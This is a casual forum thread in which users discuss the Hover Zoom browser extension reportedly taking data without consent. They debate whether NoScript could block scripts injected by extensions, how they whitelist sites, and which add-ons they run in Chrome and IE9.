WC has embedded the image link on,I doubt there is any extension would work;yet this only constrained on forum,gallery is fine though as I used alternative extension:Hover Free.  

From looking over that article and glancing at the code in question, I don't think that noscript would be effective against that sort of attack. In this case the script is not being hosted externally and referenced in the actual page, but hosted in memory and injected by the browser itself, so it really depends on how/when it does that (I'm not familiar with chrome extensions, and that appears to be native functionality of the chrome extension API). I could be wrong though since I can only assume based on the way it works in firefox.

Noscript would only be able to stop it if it actually injects a script tag referencing some URI that can be blocked to the page content itself before it hits the rendering engine. But I would suspect it works more like Greasemonkey does where scripts are just run in the page context after they are rendered (at which point noscript does not even know about it). And noscript has never been able to block anything directly embedded in the page (in case it does it that way), only external references.

Certainly noscript could have some special functionality just for scenarios like this (I believe it does stuff like block cross-domain form posts to prevent XSS, but this particular case was using GETs). They did use to have support for blocking external references into packaged files in extensions in firefox but that was since removed. Assumably there is some base feature for that now but I'm not familiar with it--haven't written firefox extensions in a long time.

Thanks for the fast response, kryo. I'll direct Martin Brinkmann's attention to your thoughts. My only purpose was to alert folks using the extension that their info was being taken without express consent...which is not ethical, imo.

Noscript is pretty handy in general to preemptively protect against ad-borne attacks (which represent a substantial number of them these days) though. But part of living with it is being able to deal with whitelisting sites you trust so that they work fully/correctly. And it can be a tough decision when your own security is pitted against your favorite sites' income stream because of ads.

Fortunately, I believe we only run locally-hosted ads for our own products here nowadays, so there is no risk or concern for users to whitelist us if they are using such extensions. It would be nice if more sites did the same, though.

Not sure in what way it doesn't interact well, Doc.  Can you elaborate?

I've never run into any issues with WC and NoScript, but then I've trusted WC.

When I used NoScript, I had to whitelist the site, same with Adblock/Adblock Plus... the problem I encountered was with the Gallery and responses.

I use Chrome exclusively now and this is the first time I'm hearing about this Hoverzoom. I only have two extensions...the one ASC puts there and Hitman Pro. That's it.

Unless you are the most patient person on the planet, whitelisting is the only way to use NoScript effectively.  I know any site can be compromised, but sometimes ya just gotta have a little faith. 

Only 'addon' I have in Chrome is donottrackplus.

Only 'addons' I have in IE9 [cannot use 10 or 11...fucks FSX you moron Microsoft] are donottrackplus and tineye.

Always work on the idea you don't NEED addons....